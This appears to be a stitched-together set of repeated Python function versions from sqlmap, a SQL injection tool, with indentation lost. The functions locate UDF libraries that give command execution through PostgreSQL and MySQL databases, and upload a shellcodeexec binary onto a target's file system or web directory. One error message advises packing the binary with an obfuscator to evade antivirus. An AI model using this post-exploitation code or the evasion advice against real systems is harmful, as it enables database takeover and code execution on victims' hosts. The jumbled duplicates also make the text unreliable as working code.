def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
self.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"]
if banVer >= "9.0":
majorVer = "9.0"
elif banVer >= "8.4":
majorVer = "8.4"
elif banVer >= "8.3":
majorVer = "8.3"
elif banVer >= "8.2":
majorVer = "8.2"
else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise SqlmapUnsupportedFeatureException(errMsg)
if Backend.isOs(OS.WINDOWS):
self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (
Backend.getArch(), majorVer)
self.udfSharedLibExt = "dll"
else:
self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (
Backend.getArch(), majorVer)
self.udfSharedLibExt = "so"
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
self.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"]
if banVer >= "10":
majorVer = banVer.split('.')[0]
elif banVer >= "8.2" and '.' in banVer:
majorVer = '.'.join(banVer.split('.')[:2])
else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise SqlmapUnsupportedFeatureException(errMsg)
try:
if Backend.isOs(OS.WINDOWS):
_ = os.path.join(self.udfLocalFile, "postgresql", "windows",
"%d" % Backend.getArch(), majorVer,
"lib_postgresqludf_sys.dll_")
checkFile(_)
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "dll"
else:
_ = os.path.join(self.udfLocalFile, "postgresql", "linux",
"%d" % Backend.getArch(), majorVer,
"lib_postgresqludf_sys.so_")
checkFile(_)
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "so"
except SqlmapSystemException:
errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (
majorVer, Backend.getArch())
raise SqlmapUnsupportedFeatureException(errMsg)
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
self.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"]
if banVer >= "9.1":
majorVer = "9.1"
elif banVer >= "9.0":
majorVer = "9.0"
elif banVer >= "8.4":
majorVer = "8.4"
elif banVer >= "8.3":
majorVer = "8.3"
elif banVer >= "8.2":
majorVer = "8.2"
else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise SqlmapUnsupportedFeatureException(errMsg)
if Backend.isOs(OS.WINDOWS):
_ = os.path.join(self.udfLocalFile, "postgresql", "windows",
"%d" % Backend.getArch(), majorVer,
"lib_postgresqludf_sys.dll_")
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "dll"
else:
_ = os.path.join(self.udfLocalFile, "postgresql", "linux",
"%d" % Backend.getArch(), majorVer,
"lib_postgresqludf_sys.so_")
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "so"
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
if Backend.isOs(OS.WINDOWS):
self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % Backend.getArch()
self.udfSharedLibExt = "dll"
else:
self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % Backend.getArch()
self.udfSharedLibExt = "so"
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
if Backend.isOs(OS.WINDOWS):
self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % Backend.getArch()
self.udfSharedLibExt = "dll"
else:
self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % Backend.getArch()
self.udfSharedLibExt = "so"
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
if Backend.isOs(OS.WINDOWS):
_ = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll_")
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "dll"
else:
_ = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so_")
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "so"
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
if Backend.isOs(OS.WINDOWS):
_ = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll_")
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "dll"
else:
_ = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so_")
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "so"
def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = paths.SQLMAP_SEXEC_PATH
if Backend.isOs(OS.WINDOWS):
self.shellcodeexecLocal += "/windows/shellcodeexec.x%s.exe" % "32"
else:
self.shellcodeexecLocal += "/linux/shellcodeexec.x%s" % Backend.getArch(
)
__basename = "tmpse%s%s" % (self._randStr,
".exe" if Backend.isOs(OS.WINDOWS) else "")
if web:
self.shellcodeexecRemote = "%s/%s" % (self.webDirectory,
__basename)
else:
self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
self.shellcodeexecRemote = ntToPosixSlashes(
normalizePath(self.shellcodeexecRemote))
logger.info("uploading shellcodeexec to '%s'" %
self.shellcodeexecRemote)
if web:
self.webUpload(self.shellcodeexecRemote,
self.webDirectory,
filepath=self.shellcodeexecLocal)
else:
self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote,
"binary")
def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = paths.SQLMAP_SEXEC_PATH
if Backend.isOs(OS.WINDOWS):
self.shellcodeexecLocal += "/windows/shellcodeexec.x%s.exe" % "32"
else:
self.shellcodeexecLocal += "/linux/shellcodeexec.x%s" % Backend.getArch()
# TODO: until web.py's __webFileStreamUpload() method does not consider the destFileName
# __basename = "tmpse%s%s" % (self.__randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
__basename = os.path.basename(self.shellcodeexecLocal)
if web:
self.shellcodeexecRemote = "%s/%s" % (self.webDirectory, __basename)
else:
self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote))
logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote)
if web:
self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, self.webDirectory)
else:
self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary")
def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = paths.SQLMAP_SEXEC_PATH
if Backend.isOs(OS.WINDOWS):
self.shellcodeexecLocal += "/windows/shellcodeexec.x%s.exe" % "32"
else:
self.shellcodeexecLocal += "/linux/shellcodeexec.x%s" % Backend.getArch(
)
# TODO: until web.py's __webFileStreamUpload() method does not consider the destFileName
#__basename = "tmpse%s%s" % (self.__randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
__basename = os.path.basename(self.shellcodeexecLocal)
if web:
self.shellcodeexecRemote = "%s/%s" % (self.webDirectory,
__basename)
else:
self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
self.shellcodeexecRemote = ntToPosixSlashes(
normalizePath(self.shellcodeexecRemote))
logger.info("uploading shellcodeexec to '%s'" %
self.shellcodeexecRemote)
if web:
self.webFileUpload(self.shellcodeexecLocal,
self.shellcodeexecRemote, self.webDirectory)
else:
self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote,
"binary")
def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH,
"shellcodeexec")
if Backend.isOs(OS.WINDOWS):
self.shellcodeexecLocal = os.path.join(
self.shellcodeexecLocal, "windows",
"shellcodeexec.x%s.exe_" % "32")
content = decloak(self.shellcodeexecLocal)
if SHELLCODEEXEC_RANDOM_STRING_MARKER in content:
content = content.replace(
SHELLCODEEXEC_RANDOM_STRING_MARKER,
randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER)))
_ = cloak(data=content)
handle, self.shellcodeexecLocal = tempfile.mkstemp(
suffix="%s.exe_" % "32")
os.close(handle)
with open(self.shellcodeexecLocal, "w+b") as f:
f.write(_)
else:
self.shellcodeexecLocal = os.path.join(
self.shellcodeexecLocal, "linux",
"shellcodeexec.x%s_" % Backend.getArch())
__basename = "tmpse%s%s" % (self._randStr,
".exe" if Backend.isOs(OS.WINDOWS) else "")
self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
self.shellcodeexecRemote = ntToPosixSlashes(
normalizePath(self.shellcodeexecRemote))
logger.info("uploading shellcodeexec to '%s'" %
self.shellcodeexecRemote)
if web:
written = self.webUpload(self.shellcodeexecRemote,
os.path.split(
self.shellcodeexecRemote)[0],
filepath=self.shellcodeexecLocal)
else:
written = self.writeFile(self.shellcodeexecLocal,
self.shellcodeexecRemote,
"binary",
forceCheck=True)
if written is not True:
errMsg = "there has been a problem uploading shellcodeexec, it "
errMsg += "looks like the binary file has not been written "
errMsg += "on the database underlying file system or an AV has "
errMsg += "flagged it as malicious and removed it. In such a case "
errMsg += "it is recommended to recompile shellcodeexec with "
errMsg += "slight modification to the source code or pack it "
errMsg += "with an obfuscator software"
logger.error(errMsg)
return False
else:
logger.info("shellcodeexec successfully uploaded")
return True
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
self.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"]
if banVer >= "9.4":
majorVer = "9.4"
elif banVer >= "9.3":
majorVer = "9.3"
elif banVer >= "9.2":
majorVer = "9.2"
elif banVer >= "9.1":
majorVer = "9.1"
elif banVer >= "9.0":
majorVer = "9.0"
elif banVer >= "8.4":
majorVer = "8.4"
elif banVer >= "8.3":
majorVer = "8.3"
elif banVer >= "8.2":
majorVer = "8.2"
else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise SqlmapUnsupportedFeatureException(errMsg)
try:
if Backend.isOs(OS.WINDOWS):
_ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_")
checkFile(_)
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "dll"
else:
_ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_")
checkFile(_)
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "so"
except SqlmapSystemException:
errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch())
raise SqlmapUnsupportedFeatureException(errMsg)
def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = paths.SQLMAP_SEXEC_PATH
if Backend.isOs(OS.WINDOWS):
self.shellcodeexecLocal += "/windows/shellcodeexec.x%s.exe" % "32"
else:
self.shellcodeexecLocal += "/linux/shellcodeexec.x%s" % Backend.getArch()
__basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
if web:
self.shellcodeexecRemote = "%s/%s" % (self.webDirectory, __basename)
else:
self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote))
logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote)
if web:
self.webUpload(self.shellcodeexecRemote, self.webDirectory, filepath=self.shellcodeexecLocal)
else:
self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary")
def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec")
if Backend.isOs(OS.WINDOWS):
self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32")
content = decloak(self.shellcodeexecLocal)
if SHELLCODEEXEC_RANDOM_STRING_MARKER in content:
content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER)))
_ = cloak(data=content)
handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32")
os.close(handle)
with open(self.shellcodeexecLocal, "w+b") as f:
f.write(_)
else:
self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch())
__basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote))
logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote)
if web:
written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal)
else:
written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True)
if written is not True:
errMsg = "there has been a problem uploading shellcodeexec, it "
errMsg += "looks like the binary file has not been written "
errMsg += "on the database underlying file system or an AV has "
errMsg += "flagged it as malicious and removed it. In such a case "
errMsg += "it is recommended to recompile shellcodeexec with "
errMsg += "slight modification to the source code or pack it "
errMsg += "with an obfuscator software"
logger.error(errMsg)
return False
else:
logger.info("shellcodeexec successfully uploaded")
return True
def udfSetLocalPaths(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
self.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"]
if banVer >= "9.0":
majorVer = "9.0"
elif banVer >= "8.4":
majorVer = "8.4"
elif banVer >= "8.3":
majorVer = "8.3"
elif banVer >= "8.2":
majorVer = "8.2"
else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise sqlmapUnsupportedFeatureException, errMsg
if Backend.isOs(OS.WINDOWS):
self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer)
self.udfSharedLibExt = "dll"
else:
self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (Backend.getArch(), majorVer)
self.udfSharedLibExt = "so"
